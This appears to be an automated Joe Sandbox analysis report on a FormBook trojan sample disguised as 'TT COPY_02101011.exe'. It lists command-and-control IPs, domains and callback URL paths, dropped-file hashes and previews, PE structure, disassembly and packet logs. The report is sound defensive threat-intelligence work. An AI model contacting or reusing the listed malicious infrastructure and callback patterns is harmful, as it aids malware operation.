IP	Domain	Country	ASN	ASN Name	Malicious
37.123.118.150	www.blttsperma.quest	United Kingdom	13213	UK2NET-ASGB	true
213.186.33.5	www.le-hameau-enchanteur.com	France	16276	OVHFR	true
185.65.236.168	helpfromjames.com	United Kingdom	33968	INTERNETENGINEERINGASGB	true
198.54.125.56	webartsolution.net	United States	22612	NAMECHEAP-NETUS	true
151.139.128.11	w2y6q8s9.stackpathcdn.com	United States	20446	HIGHWINDS3US	true
143.95.80.65	intelldat.com	United States	62729	ASMALLORANGE1US	true
3.96.23.237	www.yesrecompensas.lat	United States	16509	AMAZON-02US	true
172.67.158.42	www.gadget198.xyz	United States	13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	528714
Start date:	25.11.2021
Start time:	17:47:24
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 26s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	TT COPY_02101011.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@8/2@13/8
EGA Information:	Failed
HDC Information:	Successful, ratio: 24.9% (good quality ratio 22.6%) Quality average: 75.3% Quality standard deviation: 31%
HCA Information:	Successful, ratio: 89% Number of executed functions: 84 Number of non-executed functions: 183
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 92.122.145.220 Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37.123.118.150	XKLyPH8fil.exe	Get hash	malicious	Browse	www.piperskara.quest/bcwg/?n2Jxc2=LQgramtgvz9gpRCm69Bgg9zYzNqDoKXe/xoOYyM20y9Hdwqa+bZJQ26d8/uTsQZaK3jtWYMCag==&y2JxkH=7nx4wVHx1hZHPtlP
	Citation-HEQ211025001T-EXPP v4,pdf.exe	Get hash	malicious	Browse	www.badkyker.quest/b62n/?0N645BeP=eFIp1pQq3ETUGTceTruOFOJ1dQmPu2LEZmadZ4szDyfrUCBwXGEH/Drl48Om3GOk+gVG&vVSdF=CPGHuRZ
	VSL_MV SEA-BLUE SHIP OWNERS.exe	Get hash	malicious	Browse	www.blttsperma.quest/e8ia/?m0D8S=cRcPqDD8gRHP&3f0LiN=pR2xmGsT/5nillNQjkLQ+n9+6iNIwMBz7svLGcpZWnNs4I/1r36jcwvV3IT8Xqaw6HRS
	Order.exe	Get hash	malicious	Browse	www.sytypij.xyz/jy0b/?gR-P5L=JDHDbHM0&j2Jp=eYa2jAjhrU72L3WVpxH9jsjNT0srQ2ahDVTWcuHziu1GnXFZstAE4JmEMDfUnYWcFCv5
	New Offer.exe	Get hash	malicious	Browse	www.oporbagehi.quest/ecus/?d6AdKh=KpN4wErd7wd6llqzpYzMQWPswpobIZ1kAW5Qs8tqKzxMxpJ7Q8ocWbT+8LJmfPS2zarQ&IfRL=5jZ4UJDHJvFlB8
	202111161629639000582.exe	Get hash	malicious	Browse	www.atinokvanta.quest/wkgp/?2dX=P6APITtHDX2tmpK&4h5=npCMCl+RregmTw6cx8+byq65zg7h1u/lJ5mbqhiD7E8vI14+TRkcHQFH1Zs3yeqswACN
	vGULtWc6Jh.exe	Get hash	malicious	Browse	www.krallechols.quest/scb0/?NBZ4cP=XHAF2WnuIR8IW6HytrV3Cr1d9KXYf9+Xd4qi9e8E1EN5vKa6DU4i1iuF59U9gzfK/Tw0tTlNxw==&q6h=5jxdANKPGHO8HP5p
	7OjVU04f8q.exe	Get hash	malicious	Browse	www.heglemrca.quest/gtc5/?8ph=lCkVMu55gkgFdbVVVGZph8qEoSdcluTQL+LKOCcEpF7+otlKd5QeJhNynVws+cZ9KW9V&U0GDa=fB_X46C
	rfq.exe	Get hash	malicious	Browse	www.hrtogjort.quest/s2qi/?MhBd9XLx=HbGGlsNKynhRn1OZSUDTcU11jE9KquvSJxsaBbHywHdHvBVsuicee/3hTkOTqTMLFva3&C48h=pVtdTPKHwt9dZ63P
	DHL50458006SHP.exe	Get hash	malicious	Browse	www.hoedetamni.quest/gab8/?r6VTf8yP=Zf6VUcDVhu0aqEZvSUrwMEMdRMHbm2PdB59ahhn3b7f2yp7kqyIqWmK4U818rxqelde0&gPtX=0b0L5phHSpgxbZl0
	DuxgwH47QB.exe	Get hash	malicious	Browse	www.tuuttidisney.quest/cfn8/?wZEhNtn=GNR/cswsNXaTiqGvaiOTwsMtTfgjjwHaPXMbbiwu1L+Zpp8z0hBER1I6yfXZZZrQ1pKU&7ntP2=G2JlCZwhJ8t
	SWIFT-MLSB-11,546__doc.exe	Get hash	malicious	Browse	www.mtliglhare.quest/ubw4/?VZYl2Vp=qL1mP/x0XSkEHwyuRhVdYoin7gtKozj3LYPYdVwNJXx54g06P5J7f6F5vLOjeL9T1oXj&G4=1bnHHhbxClV
	PRODUCT LIST.exe	Get hash	malicious	Browse	www.aprilsaak.quest/r4gk/?6l=3fjP&1bm0IRS8=dD2+aeCUO1pkqpyruayuoeI20NWaZ6jY1kQ6if7hU6jXgmj08xN16ajd8indwcDO0NbIixWhaw==
	SWIFT DOCUMENT COPY.exe	Get hash	malicious	Browse	www.corajevedrai.quest/upwd/?x8=hpO3CcePYc3prcoIGVA6owp1UQBNNFXR4gqjueTrWIrEzkWp/yee+5MWCTf63rWqID1C&xtHlu=0puh52O0_h
	Payment Order.exe	Get hash	malicious	Browse	www.stabisville.quest/nurc/?n0Gpir=xERCAQBI2m4XRT5CLsnYgM+az/rVRLQ1H441UzEPFH2QLlvjvR24zCN7skS1qjoDAA+XcrVssg==&TvZl=6lHLirfHDXX034Pp
	SOA & INV FOR OCT'21.exe	Get hash	malicious	Browse	www.ctenemuhos.quest/u0n0/?EZl=KZxX4F_xJ&e64=fcUCpViyTx4uxXwUqP+G8p0RJhbnp/Z5ub+Zi25WexS7pBXOke7f54ZjxydeLif1AgF3
	Purchase Contract.xlsx	Get hash	malicious	Browse	www.tyralruutan.quest/ht08/?bxl0i=0LfY3BA00YnG8e5qQo14XrLHsratMBYj67fE9qBxS9FBqgxOIw3Kg+qKVmnM3o0/QqiBVg==&vv-hIb=4hgpGxNXe
	Quotation No. 1687R.exe	Get hash	malicious	Browse	www.sundaytejero.quest/snec/?V4tH=KdT+8tt7OUCbDfTw0fk36Q5Xf/UpdKxEg1K3hHLxh6D05f55cX0U/jLAC3JjknW7yeD82nGrpw==&hD=-Zl0iNBHyhVpI
	HCCuazHtYM.exe	Get hash	malicious	Browse	www.sittedarren.quest/sywu/?Wdcl=fHRuPhyQjgmYV5E+eKHhA+2gSo4Cg/nheMJ8Ybl6zEGQxH+hZl6uDzrGB7nkpCNUypvn&f0=6lux
	Enquiry Reference Number 0025559278.exe	Get hash	malicious	Browse	www.kermmehienon.quest/u0n0/?2d0Xs=E6PhrdPh&j0DxqnKx=TP634yAaw8AegrTYjeROOFA+5EuX4ENZ2Qm/rilUcShsZcOxcZkZp/kd1VI3lEZa/kSo

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
www.blttsperma.quest	VSL_MV SEA-BLUE SHIP OWNERS.exe	Get hash	malicious	Browse	37.123.118.150
www.blttsperma.quest	Original Shipment Doc Ref 2853801324189923,PDF.exe	Get hash	malicious	Browse	37.123.118.150
www.bestinvest-4-you.com	POSGORSGL2110210416.exe	Get hash	malicious	Browse	104.21.31.204
wss.easycompanies.com.au	VSL_MV SEA-BLUE SHIP OWNERS.exe	Get hash	malicious	Browse	13.210.99.21
	NEW ORDER 3742.exe	Get hash	malicious	Browse	13.55.94.210
	Swift001.exe	Get hash	malicious	Browse	13.55.94.210

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
UK2NET-ASGB	XKLyPH8fil.exe	Get hash	malicious	Browse	37.123.118.150
	Citation-HEQ211025001T-EXPP v4,pdf.exe	Get hash	malicious	Browse	37.123.118.150
	VSL_MV SEA-BLUE SHIP OWNERS.exe	Get hash	malicious	Browse	37.123.118.150
	Order.exe	Get hash	malicious	Browse	37.123.118.150
	New Offer.exe	Get hash	malicious	Browse	37.123.118.150
	202111161629639000582.exe	Get hash	malicious	Browse	37.123.118.150
	vGULtWc6Jh.exe	Get hash	malicious	Browse	37.123.118.150
	2YnVgiNH23	Get hash	malicious	Browse	83.170.125.27
	7OjVU04f8q.exe	Get hash	malicious	Browse	37.123.118.150
	rfq.exe	Get hash	malicious	Browse	37.123.118.150
	DHL50458006SHP.exe	Get hash	malicious	Browse	37.123.118.150
	DuxgwH47QB.exe	Get hash	malicious	Browse	37.123.118.150
	SWIFT-MLSB-11,546__doc.exe	Get hash	malicious	Browse	37.123.118.150
	PRODUCT LIST.exe	Get hash	malicious	Browse	37.123.118.150
	SWIFT DOCUMENT COPY.exe	Get hash	malicious	Browse	37.123.118.150
	Payment Order.exe	Get hash	malicious	Browse	37.123.118.150
	SOA & INV FOR OCT'21.exe	Get hash	malicious	Browse	37.123.118.150
	Purchase Contract.xlsx	Get hash	malicious	Browse	37.123.118.150
	Quotation No. 1687R.exe	Get hash	malicious	Browse	37.123.118.150
	HCCuazHtYM.exe	Get hash	malicious	Browse	37.123.118.150

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\5itxry81kuzl8up3 Download File
Process:	C:\Users\user\Desktop\TT COPY_02101011.exe
File Type:	data
Category:	dropped
Size (bytes):	219451
Entropy (8bit):	7.993798564303036
Encrypted:	true
SSDEEP:	6144:XXWWWWWWWWWWWWWW9+HY+ryMDZ5cejsybkgbx+1Tzh+VWwCfQ5R:nWWWWWWWWWWWWWW9+DykZmeAk/9sNoWA
MD5:	7CFBCCD72474438D7FC638703213241C
SHA1:	45DA096B227587739BE2CFD1FD216A7A0FC40A9A
SHA-256:	02E9F10A4673CF06DC6DED72098E6D37E6162B5C88937EB67EBBFC0C0EE39D58
SHA-512:	66B38FD3C6A4A9C85338E13776204A65A4BE9323357C7758472946F2CC21ECE513D4DF4790CF232D109083365360046BE38732725F09B56D5FC0BF4B0CC0629B
Malicious:	false
Reputation:	low
Preview:	0..c.K./\|y.Su3U...O.......r)........b..,qLP..P4..K#8%.....(g.+...C.\......kL.V.../.4......p.{........<.J~....(..T.......[..LP..?."7.W.f.'...$...E.R...2]{[.i..A.6....$...#.iC.OU.Rq..n......~..c4.......N....1e..S..[..z..k.... j.Q.@..FR.'.a...w..0..r..I.K./\|>.9. ...^YO.'......... ..Q..,qLP..P4..K#8%.....(>.+\|.....SY..4.x._Gq....it. .>.:...p...s.P.ff4..U...7.N......[..w..:.h.v......N.bl.H..(FH>.0/$m....x..f...?.E.9...@OU.^@...`....F...c4........a...v.J.S..[..z..U... j..@.@.HFR...'.a._...0....I.K./\|k.9....^YO.'.g.............b..,qLP..P4..K#8%.....(>.+\|.....SY..4.x._Gq....it. .>.:...p...s.P.ff4..U...7.N......[..w..:.h.v......N.bl.H..(FH>.0/$m....x..f...?.E.#.iC.OU......^...N1...c4........a...1.J.S..[..z..U... j..@.@.HFR...'.a._...0....I.K./\|k.9....^YO.'.g.............b..,qLP..P4..K#8%.....(>.+\|.....SY..4.x._Gq....it. .>.:...p...s.P.ff4..U...7.N......[..w..:.h.v......N.bl.H..(FH>.0/$m....x..f...?.E.#.iC.OU......^...N1...c4........a...1.J.S..[..z..U... j

C:\Users\user\AppData\Local\Temp\nshA78C.tmp\wdtzbwxasut.dll Download File
Process:	C:\Users\user\Desktop\TT COPY_02101011.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	119296
Entropy (8bit):	6.288224575764392
Encrypted:	false
SSDEEP:	1536:oEQbLaInqrSaynnz92zu5Q8cnsu0azuIC9ry1VAqKjMoZfSVgHJsWjcdOeJ:mnOSFpl4u9jqwQV02OeJ
MD5:	54C860C5CD0476D353802753C7BBFB06
SHA1:	F3FAC4C8E96CBB528944FE76C7F74FDA8171A597
SHA-256:	19FBFDB247A76A54351902926C309FD6D3E7BE25C6DCA0062FC781215680913E
SHA-512:	83DD85D9A54A1FA688C7776A15E48D70B8EC12ED789F4AC2054FA3AFFAED3FDAA375A5BD3D542C7B1831810A4825EE518A14F2390C50BFB65D9B774BCEB6B183
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 16%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........w...w...w....G..w...%a..w...%_..w...%`..w.......w.......w.......w...w...w...)...w...)...w...)...w...)...w..Rich.w..........PE..L.....a...........!.....j...d............................................... ......................................@...H...........................................P...............................p...@............................................text....h.......j.................. ..`.bss....D................................rdata...K.......L...n..............@..@.data...............................@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.93374011532904
TrID:	Win32 Executable (generic) a (10002005/4) 92.16% NSIS - Nullsoft Scriptable Install System (846627/2) 7.80% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	TT COPY_02101011.exe
File size:	309491
MD5:	ebabc0d66a9e01cc0926f3b311feff5f
SHA1:	83a44664135a7255045becde754dae29be496c8f
SHA256:	ea8733d0ea6248e2f522487d09e7854230a648e67f1a5e90fea31f6305a1ff7b
SHA512:	b9f9c3ec7080bf31e0ab43b68f8183d75a59ae262e7320e846883f7ec91695e5e01d70432a163252712fc7bdb6e27b6e5fb6b5589e31eb8779f3b2b5586eeeeb
SSDEEP:	6144:rGidvqI+0kw8220eOw980S46r8T+1T5VM8vs+u/E4+jfQaVz6142k+QF:Zd+nzbOw9l6r8Ts5sysax6142xk
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................\...........0.....

File Icon


Icon Hash:	b2a88c96b2ca6a72

Static PE Info

General
Entrypoint:	0x4030e3
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x48EFCDCD [Fri Oct 10 21:49:01 2008 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	7fa974366048f9c551ef45714595665e

Entrypoint Preview

Instruction
sub esp, 00000180h
push ebx
push ebp
push esi
xor ebx, ebx
push edi
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 00409158h
xor esi, esi
mov byte ptr [esp+14h], 00000020h
call dword ptr [00407030h]
push 00008001h
call dword ptr [004070B0h]
push ebx
call dword ptr [0040727Ch]
push 00000008h
mov dword ptr [0042EC18h], eax
call 00007F80707D36A8h
mov dword ptr [0042EB64h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 00000160h
push eax
push ebx
push 00428F90h
call dword ptr [00407158h]
push 0040914Ch
push 0042E360h
call 00007F80707D335Fh
call dword ptr [004070ACh]
mov edi, 00434000h
push eax
push edi
call 00007F80707D334Dh
push ebx
call dword ptr [0040710Ch]
cmp byte ptr [00434000h], 00000022h
mov dword ptr [0042EB60h], eax
mov eax, edi
jne 00007F80707D0B8Ch
mov byte ptr [esp+14h], 00000022h
mov eax, 00434001h
push dword ptr [esp+14h]
push eax
call 00007F80707D2E40h
push eax
call dword ptr [0040721Ch]
mov dword ptr [esp+1Ch], eax
jmp 00007F80707D0BE5h
cmp cl, 00000020h
jne 00007F80707D0B88h
inc eax
cmp byte ptr [eax], 00000020h
je 00007F80707D0B7Ch
cmp byte ptr [eax], 00000022h
mov byte ptr [eax+eax+00h], 00000000h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x74b0	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x37000	0x900	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x28c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5b68	0x5c00	False	0.67722486413	data	6.48746502716	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x129c	0x1400	False	0.4337890625	data	5.04904254867	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x25c58	0x400	False	0.58203125	data	4.76995537906	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata	0x2f000	0x8000	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x37000	0x900	0xa00	False	0.4078125	data	3.93441125971	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x37190	0x2e8	data	English	United States
RT_DIALOG	0x37478	0x100	data	English	United States
RT_DIALOG	0x37578	0x11c	data	English	United States
RT_DIALOG	0x37698	0x60	data	English	United States
RT_GROUP_ICON	0x376f8	0x14	data	English	United States
RT_MANIFEST	0x37710	0x1eb	XML 1.0 document, ASCII text, with very long lines, with no line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, SetFileTime, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetTempPathA
USER32.dll	EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
GDI32.dll	SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
SHELL32.dll	SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
ADVAPI32.dll	RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
COMCTL32.dll	ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll	CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll	GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
11/25/21-17:50:07.050486	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49820	37.123.118.150	192.168.2.4
11/25/21-17:50:17.640515	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49824	80	192.168.2.4	143.95.80.65
11/25/21-17:50:17.640515	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49824	80	192.168.2.4	143.95.80.65
11/25/21-17:50:17.640515	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49824	80	192.168.2.4	143.95.80.65
11/25/21-17:50:56.215134	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49850	80	192.168.2.4	104.21.31.204
11/25/21-17:50:56.215134	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49850	80	192.168.2.4	104.21.31.204
11/25/21-17:50:56.215134	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49850	80	192.168.2.4	104.21.31.204

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 25, 2021 17:49:40.649804115 CET	49781	80	192.168.2.4	3.96.23.237
Nov 25, 2021 17:49:40.756318092 CET	80	49781	3.96.23.237	192.168.2.4
Nov 25, 2021 17:49:40.756525993 CET	49781	80	192.168.2.4	3.96.23.237
Nov 25, 2021 17:49:40.756764889 CET	49781	80	192.168.2.4	3.96.23.237
Nov 25, 2021 17:49:40.862729073 CET	80	49781	3.96.23.237	192.168.2.4
Nov 25, 2021 17:49:40.862773895 CET	80	49781	3.96.23.237	192.168.2.4
Nov 25, 2021 17:49:40.862920046 CET	49781	80	192.168.2.4	3.96.23.237
Nov 25, 2021 17:49:40.863126040 CET	49781	80	192.168.2.4	3.96.23.237
Nov 25, 2021 17:49:40.969424963 CET	80	49781	3.96.23.237	192.168.2.4
Nov 25, 2021 17:49:45.932276011 CET	49783	80	192.168.2.4	172.67.158.42
Nov 25, 2021 17:49:45.949707985 CET	80	49783	172.67.158.42	192.168.2.4
Nov 25, 2021 17:49:45.949867964 CET	49783	80	192.168.2.4	172.67.158.42
Nov 25, 2021 17:49:45.949994087 CET	49783	80	192.168.2.4	172.67.158.42
Nov 25, 2021 17:49:45.967196941 CET	80	49783	172.67.158.42	192.168.2.4
Nov 25, 2021 17:49:45.980499029 CET	80	49783	172.67.158.42	192.168.2.4
Nov 25, 2021 17:49:45.980601072 CET	80	49783	172.67.158.42	192.168.2.4
Nov 25, 2021 17:49:45.980667114 CET	49783	80	192.168.2.4	172.67.158.42
Nov 25, 2021 17:49:45.980726004 CET	49783	80	192.168.2.4	172.67.158.42
Nov 25, 2021 17:49:45.998821020 CET	80	49783	172.67.158.42	192.168.2.4
Nov 25, 2021 17:49:51.092364073 CET	49784	80	192.168.2.4	213.186.33.5
Nov 25, 2021 17:49:51.118983030 CET	80	49784	213.186.33.5	192.168.2.4
Nov 25, 2021 17:49:51.119358063 CET	49784	80	192.168.2.4	213.186.33.5
Nov 25, 2021 17:49:51.119391918 CET	49784	80	192.168.2.4	213.186.33.5
Nov 25, 2021 17:49:51.146656990 CET	80	49784	213.186.33.5	192.168.2.4
Nov 25, 2021 17:49:51.146681070 CET	80	49784	213.186.33.5	192.168.2.4
Nov 25, 2021 17:49:51.147888899 CET	49784	80	192.168.2.4	213.186.33.5
Nov 25, 2021 17:49:51.147927046 CET	49784	80	192.168.2.4	213.186.33.5
Nov 25, 2021 17:49:51.174853086 CET	80	49784	213.186.33.5	192.168.2.4
Nov 25, 2021 17:49:56.373147011 CET	49785	80	192.168.2.4	151.139.128.11
Nov 25, 2021 17:49:56.399692059 CET	80	49785	151.139.128.11	192.168.2.4
Nov 25, 2021 17:49:56.399797916 CET	49785	80	192.168.2.4	151.139.128.11
Nov 25, 2021 17:49:56.399925947 CET	49785	80	192.168.2.4	151.139.128.11
Nov 25, 2021 17:49:56.426296949 CET	80	49785	151.139.128.11	192.168.2.4
Nov 25, 2021 17:49:56.444983959 CET	80	49785	151.139.128.11	192.168.2.4
Nov 25, 2021 17:49:56.445044041 CET	80	49785	151.139.128.11	192.168.2.4
Nov 25, 2021 17:49:56.445082903 CET	80	49785	151.139.128.11	192.168.2.4
Nov 25, 2021 17:49:56.445122004 CET	80	49785	151.139.128.11	192.168.2.4
Nov 25, 2021 17:49:56.445161104 CET	49785	80	192.168.2.4	151.139.128.11
Nov 25, 2021 17:49:56.445163012 CET	80	49785	151.139.128.11	192.168.2.4
Nov 25, 2021 17:49:56.445192099 CET	49785	80	192.168.2.4	151.139.128.11
Nov 25, 2021 17:49:56.445202112 CET	80	49785	151.139.128.11	192.168.2.4
Nov 25, 2021 17:49:56.445242882 CET	80	49785	151.139.128.11	192.168.2.4
Nov 25, 2021 17:49:56.445247889 CET	49785	80	192.168.2.4	151.139.128.11
Nov 25, 2021 17:49:56.445282936 CET	80	49785	151.139.128.11	192.168.2.4
Nov 25, 2021 17:49:56.445322037 CET	80	49785	151.139.128.11	192.168.2.4
Nov 25, 2021 17:49:56.445327997 CET	49785	80	192.168.2.4	151.139.128.11
Nov 25, 2021 17:49:56.445342064 CET	49785	80	192.168.2.4	151.139.128.11
Nov 25, 2021 17:49:56.445358992 CET	49785	80	192.168.2.4	151.139.128.11
Nov 25, 2021 17:49:56.445362091 CET	80	49785	151.139.128.11	192.168.2.4
Nov 25, 2021 17:49:56.445394993 CET	80	49785	151.139.128.11	192.168.2.4
Nov 25, 2021 17:49:56.445455074 CET	49785	80	192.168.2.4	151.139.128.11
Nov 25, 2021 17:49:56.446290970 CET	80	49785	151.139.128.11	192.168.2.4
Nov 25, 2021 17:49:56.446326017 CET	49785	80	192.168.2.4	151.139.128.11
Nov 25, 2021 17:49:56.446348906 CET	49785	80	192.168.2.4	151.139.128.11
Nov 25, 2021 17:50:01.582222939 CET	49798	80	192.168.2.4	198.54.125.56
Nov 25, 2021 17:50:01.748457909 CET	80	49798	198.54.125.56	192.168.2.4
Nov 25, 2021 17:50:01.748611927 CET	49798	80	192.168.2.4	198.54.125.56
Nov 25, 2021 17:50:01.748836994 CET	49798	80	192.168.2.4	198.54.125.56
Nov 25, 2021 17:50:01.915517092 CET	80	49798	198.54.125.56	192.168.2.4
Nov 25, 2021 17:50:01.915540934 CET	80	49798	198.54.125.56	192.168.2.4
Nov 25, 2021 17:50:01.915874958 CET	49798	80	192.168.2.4	198.54.125.56
Nov 25, 2021 17:50:01.915910006 CET	49798	80	192.168.2.4	198.54.125.56
Nov 25, 2021 17:50:02.081880093 CET	80	49798	198.54.125.56	192.168.2.4
Nov 25, 2021 17:50:06.990891933 CET	49820	80	192.168.2.4	37.123.118.150
Nov 25, 2021 17:50:07.020564079 CET	80	49820	37.123.118.150	192.168.2.4
Nov 25, 2021 17:50:07.020719051 CET	49820	80	192.168.2.4	37.123.118.150
Nov 25, 2021 17:50:07.020860910 CET	49820	80	192.168.2.4	37.123.118.150
Nov 25, 2021 17:50:07.050319910 CET	80	49820	37.123.118.150	192.168.2.4
Nov 25, 2021 17:50:07.050486088 CET	80	49820	37.123.118.150	192.168.2.4
